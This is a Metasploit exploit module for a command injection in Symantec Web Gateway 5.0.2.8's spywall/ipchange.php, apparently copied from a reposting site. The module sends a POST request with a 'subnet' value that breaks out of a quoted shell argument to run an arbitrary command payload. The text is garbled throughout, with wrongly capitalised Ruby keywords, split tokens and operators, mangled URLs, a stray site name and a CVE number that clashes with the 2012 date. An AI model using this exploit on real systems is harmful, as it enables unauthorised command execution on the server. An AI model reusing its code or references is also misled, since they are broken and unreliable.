Require 'msf/core'
Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking
Include Msf: Exploit: Remote: HttpClient
Def initialize (info = {})
Super (update_info (info,
'Name' => "Symantec Web Gateway 5.0.2.8 ipchange. php Command Injection ",
'Description' => % q {
This module exploits a command injection vulnerability found in Symantec Web
Gateway's HTTP service due to the insecure usage of the exec () function. This module
Abuses the spywall/ipchange. php file to execute arbitrary OS commands
Authentication.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Tenable Network security', # Vulnerability Discovery
'Juan vazquez' # Metasploit module
],
'References '=>
[
['Cve', '2017-2012 '],
['Bid', '123'],
['Url', 'HTTP: // www.zerodayinitiative.com/advisories/ZDI-12-090'],
['Url', 'HTTP: // www.deletec.com/security_response/securityupdates/detail.jsp? Fid = security_advisory & pvid = security_advisory & year = 2012 & suid = 20120517_00 ']
],
'Payload' =>
{
'Badchars' => "\ x00 \ x0d \ x0a \ x26 ",
'Compat' =>
{
'Payloadtype' => 'cmd ',
'Requiredcmd' => 'generic perl ',
}
},
'Platform' => ['unix '],
'Arch '=> ARCH_CMD,
'Targets' =>
[
['Symantec Web Gateway 5.0.2.8 ', {}],
],
'Privileged' => false,
'Disclosuredate' => "May 17 2012 ",
'Defaulttarget' => 0 ))
End
Www.2cto.com
Def check
Res = send_request_raw ({
'Method' => 'get ',
'Url' => '/spywall/login. php'
})
If res and res. body = ~ /\ <Title \> Symantec Web Gateway \ <\/title \>/
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
End
Def exploit
Uri = target_uri.path
Uri <'/' if uri [-1, 1]! = '/'
Peer = "# {rhost }:# {rport }"
Post_data = "subnet ="
Post_data <"\"; "+ payload. raw + ";#"
Print_status ("# {peer}-Sending Command injection ")
Res = send_request_cgi ({
'Method' => 'post ',
'Url' => "# {uri} spywall/ipchange. php ",
'Data' => post_data
})
# If the server doesn' t return the default redirection, probably
# Something is wrong
If not res or res. code! = 302 or res. headers ['location']! ~ /SW \/admin_config.php/
Print_error ("# {peer}-Probably command not executed, aborting! ")
Return
End
End
End